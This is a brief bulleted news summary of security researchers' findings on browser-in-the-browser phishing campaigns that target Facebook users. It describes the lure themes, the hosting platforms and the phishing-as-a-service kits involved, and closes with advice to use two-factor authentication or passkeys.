Overview
- Security researchers report a marked rise in BitB campaigns over the past six months that specifically target Facebook users.
- Attackers deploy in-page pop-up windows that imitate authentic login flows, capturing credentials that are then used for account takeovers and fraud.
- Lures commonly impersonate legal threats, suspension or security alerts, and "action required" messages that funnel victims through shortened links and fake CAPTCHA gates.
- Phishing pages frequently reside on legitimate platforms such as Netlify and Vercel, with some sites mimicking Meta’s Privacy Center and harvesting personal information via fake appeal forms.
- PhaaS offerings including Sneaky2FA and Raccoon0365 have introduced BitB features, while experts advise enabling 2FA or passkeys and verifying pop-up behavior before entering credentials.